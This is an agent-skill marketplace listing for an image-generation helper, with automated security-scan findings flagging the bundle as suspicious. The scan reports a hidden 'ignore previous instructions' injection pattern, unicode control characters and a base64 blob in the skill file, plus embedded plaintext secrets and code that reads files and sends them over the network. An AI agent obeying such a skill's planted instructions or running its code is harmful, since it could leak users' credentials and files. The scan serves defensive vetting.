ClawHub
Skill flagged — suspicious patterns detected

ClawHub Security flagged this skill as suspicious. Review the scan results before using.

Playwright Dev

Generate/edit images with Nano Banana Pro (Gemini 3 Pro Image). Use for image create/modify requests incl. edits. Supports text-to-image + image-to-image; 1K...

MIT-0 · Free to use, modify, and redistribute. No attribution required.
0 · 52 · 0 current installs · 0 all-time installs
by@icesumer-lgtm
duplicate of @icesumer-lgtm/embedding-strategies
MIT-0
Security Scan
VirusTotalVirusTotal
Suspicious
View report →
OpenClawOpenClaw
Suspicious
high confidence
!
Purpose & Capability
The SKILL.md describes an image-generation/editing helper for Gemini (Nano Banana Pro) and expects an API key (GEMINI_API_KEY). However the package contains a large, general-purpose workspace (hundreds of files, agents/, dashboards/, backups, many scripts) unrelated to a single image tool. The skill metadata declares no required env or binaries, yet instructions reference GEMINI_API_KEY and the 'uv' binary. The presence of many unrelated files (agents, dashboards, backups) is disproportionate to the stated single-purpose image generator.
!
Instruction Scope
SKILL.md runtime instructions are narrowly about running a generate_image.py script, passing --api-key or GEMINI_API_KEY and reading a local input image when editing. That scope would be reasonable, but the SKILL.md contains prompt-injection indicators (see scan findings) and references absolute paths (~/.codex/skills/nano-banana-pro/scripts/...), yet the archive's file manifest shows generate_image.py located under different paths (clawhub skills/... and scripts/...), indicating a path mismatch which may cause the agent to search the filesystem unpredictably. The instructions allow passing an API key on the command line or in-chat (useful but risky), and they instruct checking files in the current working directory — expected for image edits but could be abused to read local files if code is malicious. Overall the explicit runtime instructions are narrow but there is suspicious/incoherent content and injection patterns.
!
Install Mechanism
The skill declares no install spec (instruction-only), which would normally be low-risk. Yet the uploaded bundle clearly contains many code files (93+ listed) and a 615-file manifest — inconsistent with 'instruction-only'. Because there is no explicit install step, an agent or user following SKILL.md might execute scripts directly from various paths. The mismatch between 'no install' and many included files increases risk: the package includes many unrelated artifacts and embedded secrets, and there is no controlled install provenance.
!
Credentials
Registry metadata declared no required env vars, but SKILL.md expects GEMINI_API_KEY (or --api-key). More importantly, the archive contains files with plaintext API keys, app secrets, tokens and other credentials (for example 2026-3-10afu的js备份.txt contains multiple API keys, appSecret, verificationToken, etc.) unrelated to image generation. That is a serious red flag: the bundle includes sensitive credentials that the skill neither declares nor justifies. Requiring/accepting a user API key as a command-line/chat parameter is plausible, but combined with embedded secrets and unrelated service credentials this is disproportionate.
Persistence & Privilege
The skill does not request always:true and does not declare persistent privileges. That said, the bundle itself contains many files that indicate a broad workspace (agents, memory, tokens). Installing or running scripts from this bundle could give code access to many unrelated local files. The skill does not explicitly request to modify other skills or system settings, but the presence of general workspace files increases the blast radius if code is executed.
Scan Findings in Context
[ignore-previous-instructions] unexpected: This prompt-injection pattern was detected inside SKILL.md. It is not expected for a straightforward image-generation helper and suggests attempts to manipulate instruction flow.
[base64-block] unexpected: A base64-like block pattern was detected in SKILL.md. Legitimate image-generation instructions rarely need embedded opaque base64 blobs; this is unexpected.
[unicode-control-chars] unexpected: Hidden/unicode-control characters were flagged in SKILL.md. These can be used to obfuscate or hide malicious directives and are not expected in a simple usage README.
What to consider before installing
Do not trust or run scripts from this skill bundle as-is. Specific steps to consider: - Stop and inspect: The package includes many unrelated files and at least one file with plaintext secrets (API keys, app secrets, tokens). Do not run any scripts until these are removed/validated. - Verify the implementation: Open the generate_image.py(s) that SKILL.md refers to and audit for arbitrary network calls, file reads/writes, or code that uploads files or environment variables to unknown endpoints. Search for any occurrences of hardcoded URLs, 'requests', 'urllib', 'socket', or subprocess/exec calls. - Remove secrets and unrelated files: If you only want the image helper, extract the minimal generate_image.py and supporting modules; remove the rest of the workspace and any files containing credentials. Ensure no plaintext secrets remain. - Avoid sharing keys in chat/CLI: Prefer setting GEMINI_API_KEY in a safe environment and avoid pasting API keys into chat messages or command-line arguments that could be logged. - Run safely: If you must try the skill, run it in an isolated environment (throwaway VM or container) with network access restricted, and monitor outbound connections. Inspect network traffic to confirm calls go only to expected Gemini/Google endpoints. - Consider sourcing: The skill has no homepage and unknown source; prefer official SDKs or well-known wrappers for Gemini / Google image APIs. If you want, I can (a) scan the generate_image.py file for network/call patterns and suspicious code, (b) search the bundle for plaintext secrets and list them so you can remove them, or (c) help extract a minimal, sanitized version of the image script that only connects to the documented Gemini endpoint.
hooks/gateway-restart-protection/handler.js:57
Shell command execution detected (child_process).
scripts/autonomous-thinking.js:193
Shell command execution detected (child_process).
scripts/triple-line-sync.js:49
Shell command execution detected (child_process).
skills/send-html-to-feishu/scripts/run.js:41
Shell command execution detected (child_process).
skills/skill-vetting/scripts/scan.py:22
Dynamic code execution detected.
skills/send-html-to-feishu/scripts/send-to-feishu.js:11
Environment variable access combined with network send.
!
skills/send-html-to-feishu/scripts/send-to-feishu.js:31
File read combined with network send (possible exfiltration).
!
skills/skill-vetting/references/patterns.md:108
Prompt-injection style instruction pattern detected.
Patterns worth reviewing
These patterns may indicate risky behavior. Check the VirusTotal and OpenClaw results above for context-aware analysis before installing.

Like a lobster shell, security has layers — review code before you run it.

Current versionv1.0.0
Download zip
latestvk97fx8jg0yr5tzgeb1nr2ymev18327ba

License

MIT-0
Free to use, modify, and redistribute. No attribution required.
Termshttps://spdx.org/licenses/MIT-0.html

SKILL.md

Nano Banana Pro Image Generation & Editing

Generate new images or edit existing ones using Google's Nano Banana Pro API (Gemini 3 Pro Image).

Usage

Run the script using absolute path (do NOT cd to skill directory first):

Generate new image:

uv run ~/.codex/skills/nano-banana-pro/scripts/generate_image.py --prompt "your image description" --filename "output-name.png" [--resolution 1K|2K|4K] [--api-key KEY]

Edit existing image:

uv run ~/.codex/skills/nano-banana-pro/scripts/generate_image.py --prompt "editing instructions" --filename "output-name.png" --input-image "path/to/input.png" [--resolution 1K|2K|4K] [--api-key KEY]

Important: Always run from the user's current working directory so images are saved where the user is working, not in the skill directory.

Default Workflow (draft → iterate → final)

Goal: fast iteration without burning time on 4K until the prompt is correct.

  • Draft (1K): quick feedback loop
    • uv run ~/.codex/skills/nano-banana-pro/scripts/generate_image.py --prompt "<draft prompt>" --filename "yyyy-mm-dd-hh-mm-ss-draft.png" --resolution 1K
  • Iterate: adjust prompt in small diffs; keep filename new per run
    • If editing: keep the same --input-image for every iteration until you’re happy.
  • Final (4K): only when prompt is locked
    • uv run ~/.codex/skills/nano-banana-pro/scripts/generate_image.py --prompt "<final prompt>" --filename "yyyy-mm-dd-hh-mm-ss-final.png" --resolution 4K

Resolution Options

The Gemini 3 Pro Image API supports three resolutions (uppercase K required):

  • 1K (default) - ~1024px resolution
  • 2K - ~2048px resolution
  • 4K - ~4096px resolution

Map user requests to API parameters:

  • No mention of resolution → 1K
  • "low resolution", "1080", "1080p", "1K" → 1K
  • "2K", "2048", "normal", "medium resolution" → 2K
  • "high resolution", "high-res", "hi-res", "4K", "ultra" → 4K

API Key

The script checks for API key in this order:

  1. --api-key argument (use if user provided key in chat)
  2. GEMINI_API_KEY environment variable

If neither is available, the script exits with an error message.

Preflight + Common Failures (fast fixes)

  • Preflight:

    • command -v uv (must exist)
    • test -n \"$GEMINI_API_KEY\" (or pass --api-key)
    • If editing: test -f \"path/to/input.png\"

  • Common failures:

    • Error: No API key provided. → set GEMINI_API_KEY or pass --api-key
    • Error loading input image: → wrong path / unreadable file; verify --input-image points to a real image
    • “quota/permission/403” style API errors → wrong key, no access, or quota exceeded; try a different key/account

Filename Generation

Generate filenames with the pattern: yyyy-mm-dd-hh-mm-ss-name.png

Format: {timestamp}-{descriptive-name}.png

  • Timestamp: Current date/time in format yyyy-mm-dd-hh-mm-ss (24-hour format)
  • Name: Descriptive lowercase text with hyphens
  • Keep the descriptive part concise (1-5 words typically)
  • Use context from user's prompt or conversation
  • If unclear, use random identifier (e.g., x9k2, a7b3)

Examples:

  • Prompt "A serene Japanese garden" → 2025-11-23-14-23-05-japanese-garden.png
  • Prompt "sunset over mountains" → 2025-11-23-15-30-12-sunset-mountains.png
  • Prompt "create an image of a robot" → 2025-11-23-16-45-33-robot.png
  • Unclear context → 2025-11-23-17-12-48-x9k2.png

Image Editing

When the user wants to modify an existing image:

  1. Check if they provide an image path or reference an image in the current directory
  2. Use --input-image parameter with the path to the image
  3. The prompt should contain editing instructions (e.g., "make the sky more dramatic", "remove the person", "change to cartoon style")
  4. Common editing tasks: add/remove elements, change style, adjust colors, blur background, etc.

Prompt Handling

For generation: Pass user's image description as-is to --prompt. Only rework if clearly insufficient.

For editing: Pass editing instructions in --prompt (e.g., "add a rainbow in the sky", "make it look like a watercolor painting")

Preserve user's creative intent in both cases.

Prompt Templates (high hit-rate)

Use templates when the user is vague or when edits must be precise.

  • Generation template:

    • “Create an image of: <subject>. Style: <style>. Composition: <camera/shot>. Lighting: <lighting>. Background: <background>. Color palette: <palette>. Avoid: <list>.”

  • Editing template (preserve everything else):

    • “Change ONLY: <single change>. Keep identical: subject, composition/crop, pose, lighting, color palette, background, text, and overall style. Do not add new objects. If text exists, keep it unchanged.”

Output

  • Saves PNG to current directory (or specified path if filename includes directory)
  • Script outputs the full path to the generated image
  • Do not read the image back - just inform the user of the saved path

Examples

Generate new image:

uv run ~/.codex/skills/nano-banana-pro/scripts/generate_image.py --prompt "A serene Japanese garden with cherry blossoms" --filename "2025-11-23-14-23-05-japanese-garden.png" --resolution 4K

Edit existing image:

uv run ~/.codex/skills/nano-banana-pro/scripts/generate_image.py --prompt "make the sky more dramatic with storm clouds" --filename "2025-11-23-14-25-30-dramatic-sky.png" --input-image "original-photo.jpg" --resolution 2K

Files

615 total
Select a file
Select a file to preview.

Comments

Loading comments…